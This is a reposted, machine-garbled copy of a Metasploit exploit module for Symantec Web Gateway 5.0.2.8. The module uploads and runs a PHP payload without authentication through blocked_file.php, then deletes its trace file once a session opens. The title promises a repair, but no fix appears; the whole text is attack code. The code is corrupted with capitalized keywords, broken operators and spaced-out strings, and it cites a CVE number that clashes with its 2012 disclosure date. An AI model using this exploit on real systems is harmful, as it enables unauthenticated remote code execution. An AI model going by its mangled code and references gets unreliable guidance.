Symantec Web Gateway 5.0.2.8 arbitrary PHP File Upload defects and repair

Require 'msf/core'
 

 
Class Metasploit3 <Msf: Exploit: Remote
 
Rank = ExcellentRanking
 

 
Include Msf: Exploit: Remote: HttpClient
 

 
Def initialize (info = {})
 
Super (update_info (info,
 
'Name' => "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability ",
 
'Description' => % q {
 
This module exploits a file upload vulnerability found in Symantec Web Gateway's
 
HTTP service. Due to the incorrect use of file extensions in the upload_file ()
 
Function, this allows us to abuse the spywall/blocked_file.php file in order
 
Upload a malicious PHP file without any authentication, which results in arbitrary
 
Code execution.
 
},
 
'License '=> MSF_LICENSE,
 
'Author' =>
 
[
 
'Tenable Network security', # Vulnerability Discovery
 
'Juan vazquez' # Metasploit module
 
],
 
'References '=>
 
[
 
['Cve', '2017-2012 '],
 
['Ossvdb', '123'],
 
['Bid', '123'],
 
['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-12-091'],
 
['Url', 'HTTP: // www.deletec.com/security_response/securityupdates/detail.jsp? Fid = security_advisory & pvid = security_advisory & year = 2012 & suid = 20120517_00 ']
 
],
 
'Payload' =>
 
{
 
'Badchars' => "\ x00"
 
},
 
'Defaultopexception' =>
 
{
 
'Exitfunction' => "none"
 
},
 
'Platform' => ['php'],
 
'Arch '=> ARCH_PHP,
 
'Targets' =>
 
[
 
['Symantec Web Gateway 5.0.2.8 ', {}],
 
],
 
'Privileged' => false,
 
'Disclosuredate' => "May 17 2012 ",
 
'Defaulttarget' => 0 ))
 
End
 

 

 
Def check
 
Res = send_request_raw ({
 
'Method' => 'get ',
 
'Url' => '/spywall/login. php'
 
})
 

 
If res and res. body = ~ /\ <Title \> Symantec Web Gateway \ <\/title \>/
 
Return Exploit: CheckCode: Detected
 
Else
 
Return Exploit: CheckCode: Safe
 
End
 
End
 

 
Def on_new_session (client)
 
If client. type = "meterpreter"
 
Client. core. use ("stdapi") if not client. ext. aliases. include? ("Stdapi ")
 
Client. fs. file. rm ("temp. php ")
 
Else
 
Client. shell_command_token ("rm temp. php ")
 
End
 
End
 

 
Def exploit
 
Uri = target_uri.path
 
Uri <'/' if uri [-1, 1]! = '/'
 
Www.2cto.com
 
Peer = "# {rhost }:# {rport }"
 
Payload_name = Rex: Text. rand_text_alpha (rand (10) + 5) + '. php'
 
Before_filename = rand_text_alpha (rand (10) + 5)
 
After_filename = rand_text_alpha (rand (10) + 5)
 

 
Post_data = Rex: MIME: Message. new
 
Post_data.add_part ("true", nil, nil, "form-data; name = \" submitted \"")
 
Post_data.add_part (before_filename, "application/octet-stream", nil, "form-data; name = \" before_filename \"")
 
Post_data.add_part (after_filename, "application/octet-stream", nil, "form-data; name = \" after_filename \"")
 
Post_data.add_part ("<? Php # {payload. encoded}?> "," Image/gif ", nil," form-data; name = \ "new_image \"; filename = \ "# {payload_name }\"")
 

 
Print_status ("# {peer}-Sending PHP payload (# {payload_name })")
 
Res = send_request_cgi ({
 
'Method' => 'post ',
 
'Url' => "# {uri} spywall/blocked_file.php ",
 
'Ctype '=> "multipart/form-data; boundary =#{ post_data.bound }",
 
'Data' => post_data.to_s
 
})
 

 
# If the server returns 200 and the body contains the name
 
# Of the default file, we assume we uploaded the malicious
 
# File successfully
 
If not res or res. code! = 200 or res. body !~ /Temp. php/
 
Print_error ("# {peer}-File wasn't uploaded, aborting! ")
 
Return
 
End
 

 
Print_status ("# {peer}-Executing PHP payload (# {payload_name })")
 
# Execute our payload
 
Res = send_request_cgi ({
 
'Method' => 'get ',
 
'Url' => "# {uri} spywall/images/upload/temp. php"
 
})
 

 
# If we don't get a 200 when we request our malicious payload, we suspect
 
# We don't have a shell, either. Print the status code for debugging purposes.
 
If res and res. code! = 200
 
Print_status ("# {peer}-Server returned # {res. code. to_s }")
 
End
 
End
 

 
End